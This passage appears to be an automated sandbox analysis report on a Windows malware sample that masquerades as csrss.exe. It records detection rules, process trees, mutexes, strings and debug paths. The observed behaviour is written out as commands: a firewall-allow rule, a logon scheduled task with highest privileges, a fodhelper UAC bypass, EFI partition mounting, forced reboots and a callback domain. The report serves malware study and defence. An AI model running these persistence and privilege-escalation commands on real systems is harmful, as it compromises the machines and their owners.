Source: 23.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.9ab080.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9ab080.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Creates files inside the system directory
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss
Found potential string decryption / allocating functions
Source: C:\Windows\rss\csrss.exe Code function: String function: 0042C330 appears 36 times
PE file does not import any functions
Source: EfiGuardDxe.efi.14.dr Static PE information: No import functions for PE file found
Source: bootmgfw.efi.14.dr Static PE information: No import functions for PE file found
Source: bootx64.efi.14.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 4t4y4r89UZ.exe Binary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe Binary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
PE / OLE file has an invalid certificate
Source: 4t4y4r89UZ.exe Static PE information: invalid certificate
Source: 4t4y4r89UZ.exe Virustotal: Detection: 33%
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File read: C:\Users\user\Desktop\4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\4t4y4r89UZ.exe "C:\Users\user\Desktop\4t4y4r89UZ.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Users\user\Desktop\4t4y4r89UZ.exe C:\Users\user\Desktop\4t4y4r89UZ.exe
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\rss\csrss.exe Process created: unknown unknown
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'roughsnow.exe'
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@62/18@12/5
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: 4t4y4r89UZ Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
Source: C:\Windows\rss\csrss.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4004:120:WilError_01
Source: 4t4y4r89UZ.exe String found in binary or memory: application/app/install.go
Source: 4t4y4r89UZ.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: 4t4y4r89UZ.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe String found in binary or memory: application/app/install.go
Source: csrss.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 4t4y4r89UZ.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 4t4y4r89UZ.exe Static file information: File size 4520488 > 1048576
Source: 4t4y4r89UZ.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x437a00
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdb source: csrss.exe
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
